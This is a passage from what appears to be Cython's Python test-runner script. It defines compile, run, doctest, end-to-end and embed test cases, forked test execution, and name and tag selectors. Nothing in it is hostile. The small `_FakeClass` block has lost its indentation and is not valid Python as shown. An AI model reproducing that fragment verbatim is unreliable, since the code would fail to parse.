            self.test_directory, self.expect_errors, self.expect_warnings, self.annotate)

    def find_module_source_file(self, source_file):
        # Fall back from '.pyx' to '.py' when no .pyx file exists.
        if not os.path.exists(source_file):
            source_file = source_file[:-1]
        return source_file

    def build_target_filename(self, module_name):
        # The generated file extension is the target language ('c' or 'cpp').
        target = '%s.%s' % (module_name, self.language)
        return target

    def related_files(self, test_directory, module_name):
        """Return support files named '<module>_*.*' next to the test."""
        is_related = re.compile('%s_.*[.].*' % module_name).match
        return [filename for filename in list_unchanging_dir(test_directory)
                if is_related(filename)]

    def copy_files(self, test_directory, target_directory, file_list):
        """Copy (or symlink) support files into the working directory.

        Preparsed tests get a rewritten copy instead of a plain copy/link.
        """
        if self.preparse and self.preparse != 'id':
            preparse_func = globals()[self.preparse]
            def copy(src, dest):
                with open(src) as fin:
                    with open(dest, 'w') as fout:
                        fout.write(preparse_func(fin.read()))
        else:
            # use symlink on Unix, copy on Windows
            try:
                copy = os.symlink
            except AttributeError:
                copy = shutil.copy

        join = os.path.join
        for filename in file_list:
            file_path = join(test_directory, filename)
            if os.path.exists(file_path):
                copy(file_path, join(target_directory, filename))

    def source_files(self, workdir, module_name, file_list):
        # The generated C/C++ file plus any related sources that were not
        # already copied into the workdir.
        return ([self.build_target_filename(module_name)] +
                [filename for filename in file_list
                 if not os.path.isfile(os.path.join(workdir, filename))])

    def split_source_and_output(self, test_directory, module, workdir):
        """Copy the test source into *workdir*, splitting off the expected
        compiler output listed after '_ERRORS'/'_WARNINGS' markers.

        Returns a (expected_errors, expected_warnings) pair of line lists.
        """
        source_file = self.find_module_source_file(os.path.join(test_directory, module) + '.pyx')
        with io_open(source_file, 'r', encoding='ISO-8859-1') as source_and_output:
            error_writer = warnings_writer = None
            out = io_open(os.path.join(workdir, module + os.path.splitext(source_file)[1]),
                          'w', encoding='ISO-8859-1')
            try:
                for line in source_and_output:
                    if line.startswith("_ERRORS"):
                        out.close()
                        out = error_writer = ErrorWriter()
                    elif line.startswith("_WARNINGS"):
                        out.close()
                        out = warnings_writer = ErrorWriter()
                    else:
                        out.write(line)
            finally:
                out.close()

        return (error_writer.geterrors() if error_writer else [],
                warnings_writer.geterrors() if warnings_writer else [])

    def run_cython(self, test_directory, module, targetdir, incdir, annotate,
                   extra_compile_options=None):
        """Run the Cython compiler on the test module, producing C/C++ code."""
        include_dirs = INCLUDE_DIRS + [os.path.join(test_directory, '..', TEST_SUPPORT_DIR)]
        if incdir:
            include_dirs.append(incdir)

        if self.preparse == 'id':
            source = self.find_module_source_file(
                os.path.join(test_directory, module + '.pyx'))
        else:
            # Preparsed tests compile the rewritten copy from the workdir.
            self.copy_files(test_directory, targetdir, [module + '.pyx'])
            source = os.path.join(targetdir, module + '.pyx')
        target = os.path.join(targetdir, self.build_target_filename(module))

        if extra_compile_options is None:
            extra_compile_options = {}

        if 'allow_unknown_names' in self.tags['tag']:
            from Cython.Compiler import Options
            Options.error_on_unknown_names = False

        # Import the compiler lazily, only once per process.
        try:
            CompilationOptions
        except NameError:
            from Cython.Compiler.Main import CompilationOptions
            from Cython.Compiler.Main import compile as cython_compile
            from Cython.Compiler.Main import default_options
        common_utility_include_dir = self.common_utility_dir

        options = CompilationOptions(
            default_options,
            include_path = include_dirs,
            output_file = target,
            annotate = annotate,
            use_listing_file = False,
            cplus = self.language == 'cpp',
            np_pythran = self.pythran_dir is not None,
            language_level = self.language_level,
            generate_pxi = False,
            evaluate_tree_assertions = True,
            common_utility_include_dir = common_utility_include_dir,
            **extra_compile_options
            )
        cython_compile(source, options=options,
                       full_module_name=module)

    def run_distutils(self, test_directory, module, workdir, incdir,
                      extra_extension_args=None):
        """Build the generated C/C++ code into an extension module.

        Returns the full path of the built shared library.
        """
        cwd = os.getcwd()
        os.chdir(workdir)
        try:
            build_extension = build_ext(get_distutils_distro())
            build_extension.include_dirs = INCLUDE_DIRS[:]
            if incdir:
                build_extension.include_dirs.append(incdir)
            build_extension.finalize_options()
            if COMPILER:
                build_extension.compiler = COMPILER

            ext_compile_flags = CFLAGS[:]

            if build_extension.compiler == 'mingw32':
                ext_compile_flags.append('-Wno-format')
            if extra_extension_args is None:
                extra_extension_args = {}

            related_files = self.related_files(test_directory, module)
            self.copy_files(test_directory, workdir, related_files)

            from distutils.core import Extension
            extension = Extension(
                module,
                sources=self.source_files(workdir, module, related_files),
                extra_compile_args=ext_compile_flags,
                **extra_extension_args
                )

            if self.language == 'cpp':
                # Set the language now as the fixer might need it
                extension.language = 'c++'

            if 'distutils' in self.tags:
                # Apply '# distutils: ...' directives from the test source.
                from Cython.Build.Dependencies import DistutilsInfo
                from Cython.Utils import open_source_file
                pyx_path = os.path.join(self.test_directory, self.module + ".pyx")
                with open_source_file(pyx_path) as f:
                    DistutilsInfo(f).apply(extension)

            if self.pythran_dir:
                from Cython.Build.Dependencies import update_pythran_extension
                update_pythran_extension(extension)

            # Apply any registered extension fixers (EXT_EXTRAS).
            for matcher, fixer in list(EXT_EXTRAS.items()):
                if isinstance(matcher, str):
                    # lazy init
                    del EXT_EXTRAS[matcher]
                    matcher = string_selector(matcher)
                    EXT_EXTRAS[matcher] = fixer
                if matcher(module, self.tags):
                    newext = fixer(extension)
                    if newext is EXCLUDE_EXT:
                        return skip_test("Test '%s' excluded due to tags '%s'" % (
                            self.name, ', '.join(self.tags.get('tag', ''))))
                    extension = newext or extension

            if self.language == 'cpp':
                extension.language = 'c++'
            build_extension.extensions = [extension]
            build_extension.build_temp = workdir
            build_extension.build_lib  = workdir
            build_extension.run()
        finally:
            os.chdir(cwd)

        try:
            get_ext_fullpath = build_extension.get_ext_fullpath
        except AttributeError:
            def get_ext_fullpath(ext_name, self=build_extension):
                # copied from distutils.command.build_ext (missing in Py2.[45])
                fullname = self.get_ext_fullname(ext_name)
                modpath = fullname.split('.')
                filename = self.get_ext_filename(modpath[-1])
                if not self.inplace:
                    filename = os.path.join(*modpath[:-1]+[filename])
                    return os.path.join(self.build_lib, filename)
                package = '.'.join(modpath[0:-1])
                build_py = self.get_finalized_command('build_py')
                package_dir = os.path.abspath(build_py.get_package_dir(package))
                return os.path.join(package_dir, filename)

        return get_ext_fullpath(module)

    def compile(self, test_directory, module, workdir, incdir,
                expect_errors, expect_warnings, annotate):
        """Run cythonize + C/C++ compile, checking expected errors/warnings.

        Returns the path of the built extension, or None for error tests.
        """
        expected_errors = expected_warnings = errors = warnings = ()
        if expect_errors or expect_warnings:
            expected_errors, expected_warnings = self.split_source_and_output(
                test_directory, module, workdir)
            test_directory = workdir

        if WITH_CYTHON:
            old_stderr = sys.stderr
            try:
                sys.stderr = ErrorWriter()
                with self.stats.time(self.name, self.language, 'cython'):
                    self.run_cython(test_directory, module, workdir, incdir, annotate)
                errors, warnings = sys.stderr.getall()
            finally:
                sys.stderr = old_stderr
            if self.test_determinism and not expect_errors:
                # Run the compiler a second time into a sibling directory and
                # compare the generated files byte for byte.
                workdir2 = workdir + '-again'
                os.mkdir(workdir2)
                self.run_cython(test_directory, module, workdir2, incdir, annotate)
                diffs = []
                for file in os.listdir(workdir2):
                    # NOTE(review): these file objects are never closed
                    # explicitly -- relies on refcounting; confirm acceptable.
                    if (open(os.path.join(workdir, file)).read()
                            != open(os.path.join(workdir2, file)).read()):
                        diffs.append(file)
                        os.system('diff -u %s/%s %s/%s > %s/%s.diff' % (
                            workdir, file,
                            workdir2, file,
                            workdir2, file))
                if diffs:
                    self.fail('Nondeterministic file generation: %s' % ', '.join(diffs))

        tostderr = sys.__stderr__.write
        if expected_warnings or (expect_warnings and warnings):
            self._match_output(expected_warnings, warnings, tostderr)
        if 'cerror' in self.tags['tag']:
            if errors:
                tostderr("\n=== Expected C compile error ===\n")
                tostderr("\n=== Got Cython errors: ===\n")
                tostderr('\n'.join(errors))
                tostderr('\n\n')
                raise RuntimeError('should have generated extension code')
        elif errors or expected_errors:
            self._match_output(expected_errors, errors, tostderr)
            return None

        so_path = None
        if not self.cython_only:
            from Cython.Utils import captured_fd, print_bytes
            from distutils.errors import CompileError, LinkError
            show_output = True
            get_stderr = get_stdout = None
            try:
                with captured_fd(1) as get_stdout:
                    with captured_fd(2) as get_stderr:
                        with self.stats.time(self.name, self.language, 'compile-%s' % self.language):
                            so_path = self.run_distutils(test_directory, module, workdir, incdir)
            except Exception as exc:
                if ('cerror' in self.tags['tag'] and
                        ((get_stderr and get_stderr()) or
                         isinstance(exc, (CompileError, LinkError)))):
                    show_output = False  # expected C compiler failure
                else:
                    raise
            else:
                if 'cerror' in self.tags['tag']:
                    raise RuntimeError('should have failed C compile')
            finally:
                if show_output:
                    stdout = get_stdout and get_stdout().strip()
                    if stdout:
                        print_bytes(
                            stdout, header_text="\n=== C/C++ compiler output: =========\n",
                            end=None, file=sys.__stderr__)
                    stderr = get_stderr and filter_stderr(get_stderr()).strip()
                    if stderr:
                        print_bytes(
                            stderr, header_text="\n=== C/C++ compiler error output: ===\n",
                            end=None, file=sys.__stderr__)
                    if stdout or stderr:
                        tostderr("\n====================================\n")
        return so_path

    def _match_output(self, expected_output, actual_output, write):
        """Assert that actual output lines equal the expected ones, dumping
        both streams via *write* on mismatch."""
        try:
            for expected, actual in zip(expected_output, actual_output):
                self.assertEqual(expected, actual)
            if len(actual_output) < len(expected_output):
                expected = expected_output[len(actual_output)]
                self.assertEqual(expected, None)
            elif len(actual_output) > len(expected_output):
                unexpected = actual_output[len(expected_output)]
                self.assertEqual(None, unexpected)
        except AssertionError:
            write("\n=== Expected: ===\n")
            write('\n'.join(expected_output))
            write("\n\n=== Got: ===\n")
            write('\n'.join(actual_output))
            write('\n\n')
            raise
class CythonRunTestCase(CythonCompileTestCase):
    """Compile a Cython module and run its doctests (optionally in a fork)."""

    def setUp(self):
        CythonCompileTestCase.setUp(self)
        from Cython.Compiler import Options
        Options.clear_to_none = False

    def shortDescription(self):
        if self.cython_only:
            return CythonCompileTestCase.shortDescription(self)
        else:
            return "compiling (%s%s) and running %s" % (self.language, "/pythran" if self.pythran_dir is not None else "", self.name)

    def run(self, result=None):
        # Custom run() so that compile errors are attributed to this test and
        # leftover threads are always checked for.
        if result is None:
            result = self.defaultTestResult()
        result.startTest(self)
        try:
            self.setUp()
            try:
                self.success = False
                ext_so_path = self.runCompileTest()
                # Py2.6 lacks "_TextTestResult.skipped"
                failures, errors, skipped = len(result.failures), len(result.errors), len(getattr(result, 'skipped', []))
                if not self.cython_only and ext_so_path is not None:
                    self.run_tests(result, ext_so_path)
                if failures == len(result.failures) and errors == len(result.errors):
                    # No new errors...
                    self.success = True
            finally:
                check_thread_termination()
        except SkipTest as exc:
            result.addSkip(self, str(exc))
            result.stopTest(self)
        except Exception:
            result.addError(self, sys.exc_info())
            result.stopTest(self)
        try:
            self.tearDown()
        except Exception:
            pass

    def run_tests(self, result, ext_so_path):
        self.run_doctests(self.module, result, ext_so_path)

    def run_doctests(self, module_or_name, result, ext_so_path):
        # Import (by name) or reuse the module and run its doctests, possibly
        # in a forked child process (see run_forked_test).
        def run_test(result):
            if isinstance(module_or_name, basestring):
                with self.stats.time(self.name, self.language, 'import'):
                    module = import_ext(module_or_name, ext_so_path)
            else:
                module = module_or_name
            tests = doctest.DocTestSuite(module)
            with self.stats.time(self.name, self.language, 'run'):
                tests.run(result)
        run_forked_test(result, run_test, self.shortDescription(), self.fork)
def run_forked_test(result, run_func, test_name, fork=True):
    """Run *run_func(result)* -- in a forked child process where possible.

    Forking keeps the tested extension module out of the parent process.
    The child pickles its PartialTestResult into a temp file, which the
    parent merges back into *result*.  On Py3, without os.fork(), or with
    fork disabled, the test simply runs in-process.
    """
    if not fork or sys.version_info[0] >= 3 or not hasattr(os, 'fork'):
        run_func(result)
        sys.stdout.flush()
        sys.stderr.flush()
        gc.collect()
        return

    # fork to make sure we do not keep the tested module loaded
    result_handle, result_file = tempfile.mkstemp()
    os.close(result_handle)
    child_id = os.fork()
    if not child_id:
        # --- child process ---
        result_code = 0
        output = None
        try:
            try:
                tests = partial_result = None
                try:
                    partial_result = PartialTestResult(result)
                    run_func(partial_result)
                    sys.stdout.flush()
                    sys.stderr.flush()
                    gc.collect()
                except Exception:
                    result_code = 1
                    if partial_result is not None:
                        if tests is None:
                            # importing failed, try to fake a test class
                            tests = _FakeClass(
                                failureException=sys.exc_info()[1],
                                _shortDescription=test_name,
                                module_name=None)
                        partial_result.addError(tests, sys.exc_info())
                output = open(result_file, 'wb')
                pickle.dump(partial_result.data(), output)
            except:
                traceback.print_exc()
        finally:
            try: sys.stderr.flush()
            except: pass
            try: sys.stdout.flush()
            except: pass
            try:
                if output is not None:
                    output.close()
            except:
                pass
            # _exit() skips atexit handlers -- the child must not run the
            # parent's cleanup.
            os._exit(result_code)

    # --- parent process ---
    try:
        cid, result_code = os.waitpid(child_id, 0)
        module_name = test_name.split()[-1]
        # os.waitpid returns the child's result code in the
        # upper byte of result_code, and the signal it was
        # killed by in the lower byte
        if result_code & 255:
            raise Exception("Tests in module '%s' were unexpectedly killed by signal %d"%
                            (module_name, result_code & 255))
        result_code >>= 8
        if result_code in (0,1):
            input = open(result_file, 'rb')
            try:
                PartialTestResult.join_results(result, pickle.load(input))
            finally:
                input.close()
        if result_code:
            raise Exception("Tests in module '%s' exited with status %d" %
                            (module_name, result_code))
    finally:
        try:
            os.unlink(result_file)
        except:
            pass
class PureDoctestTestCase(unittest.TestCase):
    """Run a pure-mode test module's doctests in plain Python (no Cython)."""

    def __init__(self, module_name, module_path, tags, stats=None):
        self.tags = tags
        self.module_name = self.name = module_name
        self.module_path = module_path
        self.stats = stats
        unittest.TestCase.__init__(self, 'run')

    def shortDescription(self):
        return "running pure doctests in %s" % self.module_name

    def run(self, result=None):
        if result is None:
            result = self.defaultTestResult()
        # Load under a distinct name to avoid clashing with a compiled
        # version of the same module.
        loaded_module_name = 'pure_doctest__' + self.module_name
        result.startTest(self)
        try:
            self.setUp()

            import imp
            with self.stats.time(self.name, 'py', 'pyimport'):
                m = imp.load_source(loaded_module_name, self.module_path)
            try:
                with self.stats.time(self.name, 'py', 'pyrun'):
                    doctest.DocTestSuite(m).run(result)
            finally:
                del m
                if loaded_module_name in sys.modules:
                    del sys.modules[loaded_module_name]
                check_thread_termination()
        except Exception:
            result.addError(self, sys.exc_info())
            result.stopTest(self)
        try:
            self.tearDown()
        except Exception:
            pass

        # Optionally type-check the module with mypy when tagged 'mypy'.
        if 'mypy' in self.tags['tag']:
            try:
                from mypy import api as mypy_api
            except ImportError:
                pass
            else:
                with self.stats.time(self.name, 'py', 'mypy'):
                    mypy_result = mypy_api.run((
                        self.module_path,
                        '--ignore-missing-imports',
                        '--follow-imports', 'skip',
                    ))
                    if mypy_result[2]:
                        self.fail(mypy_result[0])
# Matches a name with exactly one leading underscore ("private", but not
# dunder); used to strip unpicklable attributes from forked test results.
_PRIVATE_NAME_RE = re.compile(r'^_[^_]')
is_private_field = _PRIVATE_NAME_RE.match
class _FakeClass(object):
def __init__(self, **kwargs):
self._shortDescription = kwargs.get('module_name')
self.__dict__.update(kwargs)
def shortDescription(self):
return self._shortDescription
# '_TextTestResult' moved into unittest.runner in Py2.7/Py3.2; fall back to
# the old location on earlier versions.
try: # Py2.7+ and Py3.2+
    from unittest.runner import _TextTestResult
except ImportError:
    from unittest import _TextTestResult
class PartialTestResult(_TextTestResult):
    """Picklable test result collected in a forked child process.

    The child sends data() through a temp file; the parent merges it back
    into its own result object via the static join_results().
    """

    def __init__(self, base_result):
        _TextTestResult.__init__(
            self, self._StringIO(), True,
            base_result.dots + base_result.showAll*2)
        try:
            self.skipped
        except AttributeError:
            self.skipped = [] # Py2.6

    def strip_error_results(self, results):
        # Null out unpicklable private attributes before the results are
        # pickled for transfer to the parent process.
        for test_case, error in results:
            for attr_name in filter(is_private_field, dir(test_case)):
                if attr_name == '_dt_test':
                    test_case._dt_test = _FakeClass(
                        name=test_case._dt_test.name)
                elif attr_name != '_shortDescription':
                    setattr(test_case, attr_name, None)

    def data(self):
        """Return the picklable payload for join_results()."""
        self.strip_error_results(self.failures)
        self.strip_error_results(self.errors)
        return (self.failures, self.errors, self.skipped, self.testsRun,
                self.stream.getvalue())

    def join_results(result, data):
        """Static method for merging the result back into the main
        result object.
        """
        failures, errors, skipped, tests_run, output = data
        if output:
            result.stream.write(output)
        result.errors.extend(errors)
        try:
            result.skipped.extend(skipped)
        except AttributeError:
            pass # Py2.6
        result.failures.extend(failures)
        result.testsRun += tests_run

    join_results = staticmethod(join_results)

    class _StringIO(StringIO):
        # Minimal writeln() so _TextTestResult can write to a StringIO.
        def writeln(self, line):
            self.write("%s\n" % line)
class CythonUnitTestCase(CythonRunTestCase):
    """Compile a Cython module and run the unittest tests it defines
    (instead of doctests)."""

    def shortDescription(self):
        return "compiling (%s) tests in %s" % (self.language, self.name)

    def run_tests(self, result, ext_so_path):
        with self.stats.time(self.name, self.language, 'import'):
            module = import_ext(self.module, ext_so_path)
        tests = unittest.defaultTestLoader.loadTestsFromModule(module)
        with self.stats.time(self.name, self.language, 'run'):
            tests.run(result)
class CythonPyregrTestCase(CythonRunTestCase):
    """Run a CPython regression-test module after compiling it with Cython.

    Temporarily replaces test.support.run_unittest/run_doctest so that the
    stdlib test module reports into our result object.
    """

    def setUp(self):
        CythonRunTestCase.setUp(self)
        from Cython.Compiler import Options
        Options.error_on_unknown_names = False
        Options.error_on_uninitialized = False
        Options._directive_defaults.update(dict(
            binding=True, always_allow_keywords=True,
            set_initial_path="SOURCEFILE"))
        patch_inspect_isfunction()

    def related_files(self, test_directory, module_name):
        return _list_pyregr_data_files(test_directory)

    def _run_unittest(self, result, *classes):
        """Run tests from unittest.TestCase-derived classes."""
        valid_types = (unittest.TestSuite, unittest.TestCase)
        suite = unittest.TestSuite()
        for cls in classes:
            if isinstance(cls, str):
                if cls in sys.modules:
                    suite.addTest(unittest.findTestCases(sys.modules[cls]))
                else:
                    raise ValueError("str arguments must be keys in sys.modules")
            elif isinstance(cls, valid_types):
                suite.addTest(cls)
            else:
                suite.addTest(unittest.makeSuite(cls))
        with self.stats.time(self.name, self.language, 'run'):
            suite.run(result)

    def _run_doctest(self, result, module):
        self.run_doctests(module, result, None)

    def run_tests(self, result, ext_so_path):
        try:
            from test import support
        except ImportError: # Python2.x
            from test import test_support as support

        def run_test(result):
            def run_unittest(*classes):
                return self._run_unittest(result, *classes)

            def run_doctest(module, verbosity=None):
                return self._run_doctest(result, module)

            # Redirect the stdlib test helpers into our result object and
            # restore them afterwards.
            backup = (support.run_unittest, support.run_doctest)
            support.run_unittest = run_unittest
            support.run_doctest = run_doctest

            try:
                try:
                    sys.stdout.flush() # helps in case of crashes
                    with self.stats.time(self.name, self.language, 'import'):
                        module = import_ext(self.module, ext_so_path)
                    sys.stdout.flush() # helps in case of crashes
                    if hasattr(module, 'test_main'):
                        # help 'doctest.DocFileTest' find the module path through frame inspection
                        fake_caller_module_globals = {
                            'module': module,
                            '__name__': module.__name__,
                        }
                        call_tests = eval(
                            'lambda: module.test_main()',
                            fake_caller_module_globals, fake_caller_module_globals)
                        call_tests()
                        sys.stdout.flush() # helps in case of crashes
                except (unittest.SkipTest, support.ResourceDenied):
                    result.addSkip(self, 'ok')
            finally:
                support.run_unittest, support.run_doctest = backup

        run_forked_test(result, run_test, self.shortDescription(), self.fork)
class TestCodeFormat(unittest.TestCase):
    """Check all Python sources under the Cython tree with pycodestyle."""

    def __init__(self, cython_dir):
        self.cython_dir = cython_dir
        unittest.TestCase.__init__(self)

    def runTest(self):
        import pycodestyle
        # Prefer the project's tox.ini for style configuration; fall back to
        # the one next to this script.
        config_file = os.path.join(self.cython_dir, "tox.ini")
        if not os.path.exists(config_file):
            config_file=os.path.join(os.path.dirname(__file__), "tox.ini")
        paths = glob.glob(os.path.join(self.cython_dir, "**/*.py"), recursive=True)
        style = pycodestyle.StyleGuide(config_file=config_file)
        print("")  # Fix the first line of the report.
        result = style.check_files(paths)
        self.assertEqual(result.total_errors, 0, "Found code style errors.")
# Debugger tests are only collected on CPython (IS_CPYTHON is defined
# earlier in this file).
include_debugger = IS_CPYTHON
def collect_unittests(path, module_prefix, suite, selectors, exclude_selectors):
    """Import 'Tests/Test*.py' modules under *path* and add their unittest
    cases to *suite*, honoring the given include/exclude selectors."""
    def file_matches(filename):
        return filename.startswith("Test") and filename.endswith(".py")

    def package_matches(dirname):
        return dirname == "Tests"

    loader = unittest.TestLoader()

    if include_debugger:
        skipped_dirs = []
    else:
        skipped_dirs = ['Cython' + os.path.sep + 'Debugger' + os.path.sep]

    for dirpath, dirnames, filenames in os.walk(path):
        if dirpath != path and "__init__.py" not in filenames:
            # Not a package: skip it and everything below it.
            skipped_dirs.append(dirpath + os.path.sep)
            continue
        skip = False
        for dir in skipped_dirs:
            if dirpath.startswith(dir):
                skip = True
        if skip:
            continue
        parentname = os.path.split(dirpath)[-1]
        if package_matches(parentname):
            for f in filenames:
                if file_matches(f):
                    filepath = os.path.join(dirpath, f)[:-len(".py")]
                    modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
                    if not any(1 for match in selectors if match(modulename)):
                        continue
                    if any(1 for match in exclude_selectors if match(modulename)):
                        continue
                    module = __import__(modulename)
                    # Walk down to the leaf module of the dotted name.
                    for x in modulename.split('.')[1:]:
                        module = getattr(module, x)
                    suite.addTests([loader.loadTestsFromModule(module)])
def collect_doctests(path, module_prefix, suite, selectors, exclude_selectors):
    """Import modules under *path* and add their doctests to *suite*,
    honoring the given include/exclude selectors."""
    def package_matches(dirname):
        if dirname == 'Debugger' and not include_debugger:
            return False
        return dirname not in ("Mac", "Distutils", "Plex", "Tempita")

    def file_matches(filename):
        filename, ext = os.path.splitext(filename)
        blacklist = ['libcython', 'libpython', 'test_libcython_in_gdb',
                     'TestLibCython']
        return (ext == '.py' and not
                '~' in filename and not
                '#' in filename and not
                filename.startswith('.') and not
                filename in blacklist)

    import doctest
    for dirpath, dirnames, filenames in os.walk(path):
        # Prune excluded packages in place so os.walk skips them.
        for dir in list(dirnames):
            if not package_matches(dir):
                dirnames.remove(dir)
        for f in filenames:
            if file_matches(f):
                if not f.endswith('.py'): continue
                filepath = os.path.join(dirpath, f)
                if os.path.getsize(filepath) == 0: continue
                filepath = filepath[:-len(".py")]
                modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
                if not [ 1 for match in selectors if match(modulename) ]:
                    continue
                if [ 1 for match in exclude_selectors if match(modulename) ]:
                    continue
                if 'in_gdb' in modulename:
                    # These should only be imported from gdb.
                    continue
                module = __import__(modulename)
                for x in modulename.split('.')[1:]:
                    module = getattr(module, x)
                if hasattr(module, "__doc__") or hasattr(module, "__test__"):
                    try:
                        suite.addTest(doctest.DocTestSuite(module))
                    except ValueError: # no tests
                        pass
class EndToEndTest(unittest.TestCase):
    """
    This is a test of build/*.srctree files, where srctree defines a full
    directory structure and its header gives a list of commands to run.
    """
    cython_root = os.path.dirname(os.path.abspath(__file__))

    def __init__(self, treefile, workdir, cleanup_workdir=True, stats=None):
        self.name = os.path.splitext(os.path.basename(treefile))[0]
        self.treefile = treefile
        self.workdir = os.path.join(workdir, self.name)
        self.cleanup_workdir = cleanup_workdir
        self.stats = stats
        cython_syspath = [self.cython_root]
        for path in sys.path:
            if path.startswith(self.cython_root) and path not in cython_syspath:
                # Py3 installation and refnanny build prepend their
                # fixed paths to sys.path => prefer that over the
                # generic one (cython_root itself goes last)
                cython_syspath.append(path)
        self.cython_syspath = os.pathsep.join(cython_syspath[::-1])
        unittest.TestCase.__init__(self)

    def shortDescription(self):
        return "End-to-end %s" % self.name

    def setUp(self):
        from Cython.TestUtils import unpack_source_tree
        _, self.commands = unpack_source_tree(self.treefile, self.workdir)
        self.old_dir = os.getcwd()
        os.chdir(self.workdir)
        if self.workdir not in sys.path:
            sys.path.insert(0, self.workdir)

    def tearDown(self):
        if self.cleanup_workdir:
            # Retry a few times: files may still be locked briefly
            # (e.g. on Windows or with slow filesystems).
            for trial in range(5):
                try:
                    shutil.rmtree(self.workdir)
                except OSError:
                    time.sleep(0.1)
                else:
                    break
        os.chdir(self.old_dir)

    def _try_decode(self, content):
        try:
            return content.decode()
        except UnicodeDecodeError:
            return content.decode('iso-8859-1')

    def runTest(self):
        self.success = False
        # Substitute the CYTHON/PYTHON placeholders from the srctree header.
        commands = (self.commands
            .replace("CYTHON", "PYTHON %s" % os.path.join(self.cython_root, 'cython.py'))
            .replace("PYTHON", sys.executable))
        old_path = os.environ.get('PYTHONPATH')
        env = dict(os.environ)
        new_path = self.cython_syspath
        if old_path:
            new_path = new_path + os.pathsep + old_path
        env['PYTHONPATH'] = new_path
        cmd = []
        out = []
        err = []
        for command_no, command in enumerate(filter(None, commands.splitlines()), 1):
            with self.stats.time('%s(%d)' % (self.name, command_no), 'c',
                                 'etoe-build' if ' setup.py ' in command else 'etoe-run'):
                p = subprocess.Popen(command,
                                     stderr=subprocess.PIPE,
                                     stdout=subprocess.PIPE,
                                     shell=True,
                                     env=env)
                _out, _err = p.communicate()
                cmd.append(command)
                out.append(_out)
                err.append(_err)
                res = p.returncode
            if res != 0:
                # Dump the full command history on the first failure.
                for c, o, e in zip(cmd, out, err):
                    sys.stderr.write("%s\n%s\n%s\n\n" % (
                        c, self._try_decode(o), self._try_decode(e)))
            self.assertEqual(0, res, "non-zero exit status")
        self.success = True
# TODO: Support cython_freeze needed here as well.
# TODO: Windows support.
class EmbedTest(unittest.TestCase):
    """Build and run the embedding demo (Demos/embed) via its Makefile."""

    working_dir = "Demos/embed"

    def setUp(self):
        self.old_dir = os.getcwd()
        os.chdir(self.working_dir)
        os.system(
            "make PYTHON='%s' clean > /dev/null" % sys.executable)

    def tearDown(self):
        try:
            os.system(
                "make PYTHON='%s' clean > /dev/null" % sys.executable)
        except:
            pass
        os.chdir(self.old_dir)

    def test_embed(self):
        libname = sysconfig.get_config_var('LIBRARY')
        libdir = sysconfig.get_config_var('LIBDIR')
        # Probe a few likely locations for the Python library; fall back to
        # the configured LIBDIR so the error message names the right place.
        if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
            libdir = os.path.join(os.path.dirname(sys.executable), '..', 'lib')
            if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
                libdir = os.path.join(libdir, 'python%d.%d' % sys.version_info[:2], 'config')
                if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
                    # report the error for the original directory
                    libdir = sysconfig.get_config_var('LIBDIR')
        cython = 'cython.py'
        if sys.version_info[0] >=3 and CY3_DIR:
            cython = os.path.join(CY3_DIR, cython)
        cython = os.path.abspath(os.path.join('..', '..', cython))
        self.assertEqual(0, os.system(
            "make PYTHON='%s' CYTHON='%s' LIBDIR1='%s' test > make.output" % (sys.executable, cython, libdir)))
        try:
            os.remove('make.output')
        except OSError:
            pass
class MissingDependencyExcluder(object):
    """Exclude tests whose external module dependency cannot be imported.

    *deps* maps a selector string to a module name; a matcher is kept only
    for modules that fail to import.  Excluded test names are recorded in
    'tests_missing_deps'.
    """

    def __init__(self, deps):
        # deps: { matcher func : module name }
        self.exclude_matchers = []
        self.tests_missing_deps = []
        for matcher, mod in deps.items():
            try:
                __import__(mod)
            except ImportError:
                self.exclude_matchers.append(string_selector(matcher))

    def __call__(self, testname, tags=None):
        excluded = any(matcher(testname, tags) for matcher in self.exclude_matchers)
        if excluded:
            self.tests_missing_deps.append(testname)
        return excluded
class VersionDependencyExcluder(object):
    """Exclude tests that require a Python version the runtime does not match.

    *deps* maps a version tuple to a (compare, matcher) pair; a matcher is
    active when compare(sys.version_info, version) is true.  Excluded test
    names are recorded in 'tests_missing_deps'.
    """

    def __init__(self, deps):
        # deps: { version : (compare func, matcher func) }
        from sys import version_info
        self.exclude_matchers = [
            matcher
            for ver, (compare, matcher) in deps.items()
            if compare(version_info, ver)
        ]
        self.tests_missing_deps = []

    def __call__(self, testname, tags=None):
        for matcher in self.exclude_matchers:
            if matcher(testname):
                self.tests_missing_deps.append(testname)
                return True
        return False
class FileListExcluder(object):
    """Exclude tests listed in a plain-text file.

    Each non-empty, non-comment line names one test (only the first
    whitespace-separated token counts).  A test is excluded when either its
    full dotted name or its last component appears in the file.
    """

    def __init__(self, list_file, verbose=False):
        self.verbose = verbose
        self.excludes = {}
        self._list_file = os.path.relpath(list_file)
        with open(list_file) as f:
            for raw_line in f:
                entry = raw_line.strip()
                if entry and not entry.startswith('#'):
                    self.excludes[entry.split()[0]] = True

    def __call__(self, testname, tags=None):
        exclude = (testname in self.excludes
                   or testname.split('.')[-1] in self.excludes)
        if exclude and self.verbose:
            print("Excluding %s because it's listed in %s"
                  % (testname, self._list_file))
        return exclude
class TagsSelector(object):
    """Select tests whose tag list for *tag* contains *value*."""

    def __init__(self, tag, value):
        self.tag = tag
        self.value = value

    def __call__(self, testname, tags=None):
        # Without tag information, nothing matches.
        return tags is not None and self.value in tags[self.tag]
class RegExSelector(object):
    """Selects tests whose name matches a case-insensitive, Unicode-aware
    regular expression (via re.search)."""

    def __init__(self, pattern_string):
        try:
            self._pattern = re.compile(pattern_string, re.I | re.U)
        except re.error:
            print('Invalid pattern: %r' % pattern_string)
            raise
        # keep the bound-method attribute the original exposed
        self.regex_matches = self._pattern.search

    def __call__(self, testname, tags=None):
        # Returns the match object (truthy) or None, like re.search itself.
        return self.regex_matches(testname)
def string_selector(s):
    """Build a selector from a string: 'tag:value' yields a TagsSelector,
    anything else is treated as a regular expression."""
    tag, sep, value = s.partition(':')
    if sep:
        return TagsSelector(tag, value)
    return RegExSelector(s)
class ShardExcludeSelector(object):
    # This is an exclude selector so it can override the (include) selectors.
    # It may not provide uniform distribution (in time or count), but is a
    # deterministic partition of the tests which is important.

    def __init__(self, shard_num, shard_count):
        self.shard_num = shard_num
        self.shard_count = shard_count

